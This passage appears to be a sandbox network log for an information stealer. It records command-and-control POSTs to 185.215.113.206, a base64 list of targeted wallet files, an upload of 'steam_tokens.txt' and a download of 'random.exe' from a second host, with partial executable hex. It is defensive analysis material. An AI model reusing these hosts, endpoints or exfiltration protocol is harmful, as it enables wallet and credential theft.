                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:49.788970947 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:49 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    Content-Length: 80880
                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:50.626249075 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----KFIEHIIIJDAAAAAAKECB
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 1067
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:51.736886024 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:50 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=92
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:52.075264931 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----CBKFBAECBAEGDGDHIEHI
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 267
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                    Data Ascii: ------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------CBKFBAECBAEGDGDHIEHIContent-Disposition: form-data; name="message"wallets------CBKFBAECBAEGDGDHIEHI--
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:52.519743919 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:52 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Content-Length: 2408
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=91
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:52.714534044 CET467OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HCGCAAKJDHJJJJJKKKFB
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 265
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 42 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                    Data Ascii: ------HCGCAAKJDHJJJJJKKKFBContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------HCGCAAKJDHJJJJJKKKFBContent-Disposition: form-data; name="message"files------HCGCAAKJDHJJJJJKKKFB--
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:53.158804893 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:52 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=90
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:53.172740936 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----BAECFHJEBAAFIEBGHIIE
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 363
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: ------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="file"------BAECFHJEBAAFIEBGHIIE--
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:54.111421108 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:53 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=89
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:54.203495979 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HCAKFBGCBFHIJKECGIIJ
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 272
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                    Data Ascii: ------HCAKFBGCBFHIJKECGIIJContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------HCAKFBGCBFHIJKECGIIJContent-Disposition: form-data; name="message"ybncbhylepme------HCAKFBGCBFHIJKECGIIJ--
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:54.647823095 CET271INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:54 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Content-Length: 68
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=88
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d
                                                                                                                                                                                                                                                                                                                    Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    3192.168.2.749912185.215.113.16805788C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:54.807950020 CET80OUTGET /mine/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.16
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:56.149096966 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:55 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                    Content-Length: 1947648
                                                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 27 Nov 2024 08:02:27 GMT
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    ETag: "6746d213-1db800"
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVfL@M@WkDLL @.rsrcD@.idata @ +@aqmlcjde02@yinsocgvL@.taggant0L"@
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:56.149187088 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:56.149210930 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:56.149240971 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:56.149254084 CET1236INData Raw: 18 1f e6 e0 c8 cd 16 ab 69 00 fa dc 0c 04 78 47 ba ac 5e 9c 42 5a 25 4f db 7a 81 01 d8 de 75 2c 7c 22 09 56 79 e2 f1 20 d5 e9 d9 1e 59 fb e8 44 29 ea 35 61 25 08 a5 cb 7a eb 65 b0 d2 4d 76 4b 59 5e ca 0f f1 a9 9a 4c cb 2d 74 1e 99 eb ad 12 ca 89
                                                                                                                                                                                                                                                                                                                    Data Ascii: ixG^BZ%Ozu,|"Vy YD)5a%zeMvKY^L-tf1>8^x~igblv0:w+v{rh*,f\\zvceX^oq O"^%aJw/"!y&g.fc8^zg8{v)h
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:56.149266958 CET1236INData Raw: 67 1e 4c 91 a8 36 a6 de c0 42 3a 62 00 b9 fb 65 39 1c 72 74 ca 5d 1a e9 49 17 76 6c 5d 62 15 21 49 fc cd 18 9b c2 7e d7 5b 40 22 14 32 de 95 f0 ac 7d f6 0b d3 2d 7b 1d b1 dc f4 d3 d7 4a fa 2c 79 1e 80 10 b9 72 30 3f fd 31 77 78 a9 a1 5a 00 4f 7b
                                                                                                                                                                                                                                                                                                                    Data Ascii: gL6B:be9rt]Ivl]b!I~[@"2}-{J,yr0?1wxZO{~b?jf[iK2r22\g~aIKZ=L8Dsf!eB3Os-V9l=ZP`f`Y_UQ[fyUS0-FRL"U}Dt
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:56.149286032 CET1236INData Raw: e5 f5 1c 85 91 f3 19 eb 94 e9 9e a2 ca fb 3d 4e 00 91 08 41 44 6e 43 71 38 04 4d 6d 81 ec 3d 26 a6 9b 27 32 95 01 69 ff 80 4b 7a ed 77 86 63 de 66 72 1c 8e 50 e1 fb 11 8a c2 0a 1f f6 ce c8 8c 50 03 e0 b9 4a 86 5a ec af 7f de ee 90 0f 21 eb 04 3e
                                                                                                                                                                                                                                                                                                                    Data Ascii: =NADnCq8Mm=&'2iKzwcfrPPJZ!> !B"pX@j39:I+@I>tQryyd j"[\SWf)4x*d29m_EimjS`KlPFOX9l_$@AH?*I
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:56.149538994 CET1236INData Raw: ff c4 73 66 cb 82 e0 11 bd de d1 c8 00 a4 a5 07 31 0f ec fd 86 92 78 cc ca 64 f2 83 ab 29 4f 6b b5 e6 48 67 e7 8a cc fc 2d 86 12 51 f5 d3 b2 04 d1 5a 81 d9 3b 40 73 22 7e 59 ea ea af a1 9d af cb 2c ad 4f c7 64 91 65 ca 9e 81 a7 93 05 43 12 3e f7
                                                                                                                                                                                                                                                                                                                    Data Ascii: sf1xd)OkHg-QZ;@s"~Y,OdeC>k,\8CqE4hrK+$3V+L.HO$.S,R^ve]j|e).z}pBGER{,pre9jmod'_;cYHOm*
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:56.149552107 CET1236INData Raw: 5c be 68 a0 fa 98 89 e9 84 c5 59 f8 08 fb 7d 90 5d bc b4 72 b5 06 16 a6 0b ba ba d5 f5 b0 8e ec e8 e2 ed ea ac db db d9 b6 9b e6 0e 61 f5 15 e9 91 be 2f 49 e6 18 5e 22 20 db e7 e8 ce f3 27 31 8d f9 35 c3 e1 ab 8d 91 11 28 9d 4a ba 6a 5d dd e3 b8
                                                                                                                                                                                                                                                                                                                    Data Ascii: \hY}]ra/I^" '15(Jj]wq'U)ZF}i8gk%@9~[j62YUeRbib,W22!P8nSCxR4YxUAK=Ygf]lY1R
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:56.149563074 CET1236INData Raw: bf f0 d5 55 c7 2c b2 ab d7 88 d7 23 33 69 e6 3f 0d 04 cb 38 91 9e 5f ad ac cc 78 42 2a c0 e7 fd f6 bf 24 e5 ee a4 86 62 cb e4 dd 63 af 6a e4 5f 36 27 1a 21 d5 ea 58 04 6b 63 90 24 69 ad ba c6 7d b2 68 b4 a8 f0 7b 31 29 09 4f cc f0 ad 8f d4 17 36
                                                                                                                                                                                                                                                                                                                    Data Ascii: U,#3i?8_xB*$bcj_6'!Xkc$i}h{1)O661W&fH_dBn$6*`.|]3)j7h-= o2mrVALi"W=zYo& D>\3Jsgd^ M`,g2-{hf6Ir2^,C
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:56.269926071 CET1236INData Raw: a0 1c 92 75 8f 24 5e dd 3d 20 53 f1 a0 6e e2 fc f2 c2 f8 69 c3 73 5e 6c 41 0e a0 08 3d b2 66 74 29 43 77 c4 bc fe f9 0b 6c 80 ef ad 7f 72 e6 95 50 a1 9a 64 bd ae ea 66 d1 6b bf 04 b7 6e ac 02 5a 35 0b 0f f3 c6 a4 01 4a 4b 0e 6f 03 06 87 90 ee b2
                                                                                                                                                                                                                                                                                                                    Data Ascii: u$^= Snis^lA=ft)CwlrPdfknZ5JKoo\-c@y]tj]y]e5MAb'6p2P68J}W\D,|6~hUO>/{b%`Y]e7<]#/z2SACpi[>j


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    4192.168.2.749928185.215.113.206805788C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:59.866024971 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FHCGHJDBFIIDGDHIJDBG
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 272
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
